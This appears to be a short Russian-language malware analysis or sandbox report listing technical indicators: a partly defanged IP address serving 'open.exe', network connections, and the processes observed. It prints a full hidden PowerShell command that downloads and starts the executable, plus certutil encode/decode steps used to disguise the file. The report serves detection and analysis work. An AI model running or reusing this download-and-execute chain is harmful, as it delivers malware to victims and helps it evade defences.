Техническая информация
- http://14#.#17.90.64/open.exe как open.exe
- '14#.#17.90.64':80
- '14#.#17.90.64':443
- 'microsoft.com':80
- http://14#.#17.90.64/open.exe
- http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
- '14#.#17.90.64':443
- DNS ASK microsoft.com
- '%WINDIR%\syswow64\cmd.exe' /c powershell -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://14#.#17.90.64/open.exe', 'open.exe'); Start-Process open.exe -WindowStyle Hidden; certutil -f -encode op...
- '%WINDIR%\syswow64\certutil.exe' -f -encode open.exe open.enc 21418
- '%WINDIR%\syswow64\cmd.exe' /c certutil -f -decode open.enc open.exe 1852141679
- '%WINDIR%\syswow64\certutil.exe' -f -decode open.enc open.exe 1852141679